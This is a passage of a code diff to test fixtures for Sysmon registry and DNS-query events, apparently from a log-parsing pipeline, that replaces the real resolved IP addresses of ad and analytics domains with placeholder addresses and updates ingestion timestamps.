Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:44.726009900Z'/\u003e\u003cEventRecordID\u003e2687\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:44.714\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-77ae-5eb1-2c03-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e6072\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\regedit.exe\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Key 2\u003c/Data\u003e\u003cData Name='Details'\u003eQWORD (0x00000000-0x00000005)\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -2183,7 +2173,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741174600Z", + "ingested": "2021-12-09T13:50:23.456708300Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:46.818821400Z'/\u003e\u003cEventRecordID\u003e2690\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:46.808\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\ertrqvg.rkr\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -2244,47 +2234,47 @@ }, "answers": [ { - "data": "35.171.101.225", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.196.57.87", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.164.46", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.181.142", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.167.169", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.193.242.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.234.152.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.206.12.124", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "35.171.101.225", - "34.196.57.87", - "34.194.164.46", - "34.233.181.142", - "34.194.167.169", - "34.193.242.172", - "34.234.152.11", - "34.206.12.124" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -2299,20 +2289,13 @@ "ping.chartbeat.net" ], "ip": [ - "35.171.101.225", - "34.196.57.87", - "34.194.164.46", - "34.233.181.142", - "34.194.167.169", - "34.193.242.172", - "34.234.152.11", - "34.206.12.124" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741182900Z", + "ingested": "2021-12-09T13:50:23.456714Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2371,27 +2354,27 @@ }, "answers": [ { - "data": "151.101.194.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.79", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.194.79", - "151.101.2.79", - "151.101.66.79", - "151.101.130.79" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -2406,16 +2389,13 @@ "clarium.freetls.fastly.net" ], "ip": [ - "151.101.194.79", - "151.101.2.79", - "151.101.66.79", - "151.101.130.79" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741191200Z", + "ingested": "2021-12-09T13:50:23.456718Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2475,39 +2455,39 @@ }, "answers": [ { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -2515,7 +2495,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -2523,24 +2503,24 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "68.67.178.252", - "68.67.179.11", - "68.67.179.228", - "68.67.178.184", - "204.13.192.141", - "68.67.180.43", - "68.67.179.23", - "68.67.179.197", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { @@ -2555,25 +2535,18 @@ "nym1-ib.adnxs.com" ], "ip": [ - "68.67.178.252", - "68.67.179.11", - "68.67.179.228", - "68.67.178.184", - "204.13.192.141", - "68.67.180.43", - "68.67.179.23", - "68.67.179.197", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741200700Z", + "ingested": "2021-12-09T13:50:23.456722600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2641,52 +2614,52 @@ "type": "CNAME" }, { - "data": "34.196.86.129", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.250.110", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.244.108", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.224.204.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.237.44.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.210.231.21", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.172.198.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.186.227", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "34.196.86.129", - "34.233.250.110", - "18.209.244.108", - "34.224.204.11", - "34.237.44.255", - "3.210.231.21", - "54.172.198.255", - "34.199.186.227", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { @@ -2703,21 +2676,14 @@ "eb2.3lift.com" ], "ip": [ - "34.196.86.129", - "34.233.250.110", - "18.209.244.108", - "34.224.204.11", - "34.237.44.255", - "3.210.231.21", - "54.172.198.255", - "34.199.186.227", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741209700Z", + "ingested": "2021-12-09T13:50:23.456728Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2792,11 +2758,11 @@ "type": "CNAME" }, { - "data": "108.174.10.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -2804,7 +2770,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -2812,7 +2778,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -2820,7 +2786,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -2828,21 +2794,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "108.174.10.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -2859,22 +2825,22 @@ "px.ads.linkedin.com" ], "ip": [ - "108.174.10.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741216700Z", + "ingested": "2021-12-09T13:50:23.456733200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData 